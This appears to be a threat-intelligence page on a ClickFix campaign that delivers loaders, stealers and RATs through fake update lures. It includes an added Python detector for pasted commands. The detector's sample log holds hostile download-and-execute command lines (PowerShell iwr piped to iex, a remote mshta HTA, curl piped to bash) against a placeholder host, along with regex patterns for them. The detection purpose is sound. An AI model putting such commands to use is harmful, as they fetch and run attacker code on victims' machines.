ClickFix multi-loader delivery campaign targeting Windows and macOS users
Campaign
Summary
The ClickFix malware-delivery campaign is spreading BabaDeda Loader, Lorem Ipsum Loader, and Potemkin, widening risk for Windows and macOS users across several sectors. The operation uses social engineering, compromised WordPress sites, and fake update lures to trick victims into running attacker-controlled commands. Those chains can drop information stealers and RATs, creating paths to credential theft and remote access. The activity shows a sustained shift in delivery methods as operators adapt to disruptions and keep the campaign moving.
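The delivery step this campaign relies on, a victim pasting an attacker-supplied command into Win+R or a terminal, leaves a telemetry footprint that is easy to hunt for: an interpreter (PowerShell, mshta, bash) spawned directly from an interactive shell with download-and-execute arguments. The following is an added example, not code from the original page, from Huntress, or from The Hacker News. The log layout, the process names and every command-line pattern are assumptions modelled on generic ClickFix tradecraft; the page itself only states that the chain uses PowerShell social engineering and fake update lures on Windows and macOS.

```python
"""Heuristic ClickFix-style execution detector over constructed process-creation events.

Added example; the field layout, parent/child process sets and regex patterns are
assumptions for illustration and are not taken from the page or any vendor product.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent: str    # parent image name
    image: str     # child image name
    cmdline: str   # full command line of the child


# Constructed sample events, layout "host|parent|image|cmdline" (not real telemetry).
SAMPLE_LOG = """\
WS01|explorer.exe|powershell.exe|powershell -w hidden -ep bypass -c "iwr http://example.invalid/v.txt|iex"
WS01|explorer.exe|mshta.exe|mshta http://example.invalid/update.hta
WS02|code.exe|powershell.exe|powershell -NoProfile -File build.ps1
MAC01|Terminal|bash|bash -c "curl -fsSL http://example.invalid/fix.sh | bash"
WS03|explorer.exe|powershell.exe|powershell -Command Get-Process
"""

# Parents that imply a human typed or pasted the command (assumed list).
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2"}
# Interpreters and living-off-the-land binaries ClickFix lures commonly invoke (assumed list).
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "bash", "sh", "zsh"}

# (regex over the lower-cased command line, weight, reason). Assumed heuristics.
PATTERNS = [
    (r"-w(?:indowstyle)?\s+hidden", 2, "hidden window"),
    (r"-e(?:nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}", 2, "encoded command"),
    (r"-e(?:xecutionpolicy|p)\s+bypass", 1, "execution policy bypass"),
    (r"\b(?:iex|invoke-expression)\b", 2, "in-memory script execution"),
    (r"\b(?:iwr|invoke-webrequest|curl|wget)\b.*\|", 2, "download piped to interpreter"),
    (r"\bmshta(?:\.exe)?\s+\S*://", 2, "remote HTA"),
    (r"\|\s*(?:bash|sh|zsh)\b", 2, "shell fed from a pipe"),
]


def parse_log(text: str) -> list[ProcEvent]:
    """Parse the pipe-delimited sample layout; the command line may itself contain '|'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        host, parent, image, cmdline = line.split("|", 3)
        events.append(ProcEvent(host, parent, image, cmdline))
    return events


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return a weighted score and the matched reasons for one event."""
    score, reasons = 0, []
    # Parent/child pairing is the weakest signal on its own (admins do this too).
    if ev.parent.lower() in INTERACTIVE_PARENTS and ev.image.lower() in LOLBIN_CHILDREN:
        score += 1
        reasons.append("interpreter spawned from interactive shell")
    low = ev.cmdline.lower()
    for rx, weight, reason in PATTERNS:
        if re.search(rx, low):
            score += weight
            reasons.append(reason)
    return score, reasons


def detect(text: str, threshold: int = 3) -> list[tuple[str, str, int, list[str]]]:
    """Return (host, image, score, reasons) for events at or above the threshold."""
    hits = []
    for ev in parse_log(text):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.host, ev.image, score, reasons))
    return hits


if __name__ == "__main__":
    for host, image, score, reasons in detect(SAMPLE_LOG):
        print(f"{host} {image} score={score} {', '.join(reasons)}")
```

The threshold keeps the plain "explorer.exe spawned powershell.exe" case (the WS03 event) out of the alert queue, because that pairing alone is routine admin activity; it is the combination with hidden windows, policy bypass, remote fetch and in-memory execution that characterizes a pasted ClickFix command. On real telemetry the same logic maps onto Sysmon Event ID 1 or Windows 4688 with command-line auditing, and onto Endpoint Security process events on macOS.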
Related Happenings
Potemkin loader delivering EtherRAT and RMMProject in memory
Malware Activity
H score: 29
First: 16.06.2026 20:41
Last: 16.06.2026 20:41
Sources 1
How related:
"Potemkin loader is a 'custom x64 loader that uses a domain generation algorithm to find its C2 and reflectively loads follow-on modules in memory,' Huntress researchers Anna Pham and Zach Rogers said."
About this happening:
The **Potemkin** loader is delivering **EtherRAT** and **RMMProject** to **Windows** systems, giving operators in-memory payload execution and **browser credential theft**. The lo...
Atlas RAT and related loaders deployed for remote access and credential theft
Malware Activity
H score: 33
First: 04.06.2026 00:45
Last: 04.06.2026 00:45
Sources 1
About this happening:
**TA4922**, a **China-linked** and likely **financially motivated** malware activity, has expanded beyond **East Asia** into **Europe** and **Africa**. The group uses **Atlas RAT*...
Google DoubleClick malspam campaign delivering DesckVB RAT
Campaign
H score: 33
First: 03.06.2026 19:29
Last: 03.06.2026 19:29
Sources 1
About this happening:
A **new malspam campaign** is abusing **Google's DoubleClick** redirect path to evade detection and deliver **DesckVB RAT**, putting users and organizations at risk of malware inf...
Vidar Stealer ClickFix campaign targeting multiple sectors
Campaign
H score: 38
First: 08.05.2026 14:00
Last: 08.05.2026 14:00
Sources 1
About this happening:
The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
H score: 21
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Timeline
16.06.2026 20:41 · 2 articles
ClickFix multi-loader delivery campaign targeting Windows and macOS users
Initial Disclosure: In **April 2026**, a **ClickFix** delivery chain used **PowerShell** social engineering to install **BabaDeda Loader** and stage information stealers and **RATs**. The loader framework emphasized stealth and payload flexibility rather than a single fixed payload.
- ClickFix Campaigns Expand Malware Delivery With New Loaders and Fake Update Lures — thehackernews.com — 16.06.2026 20:41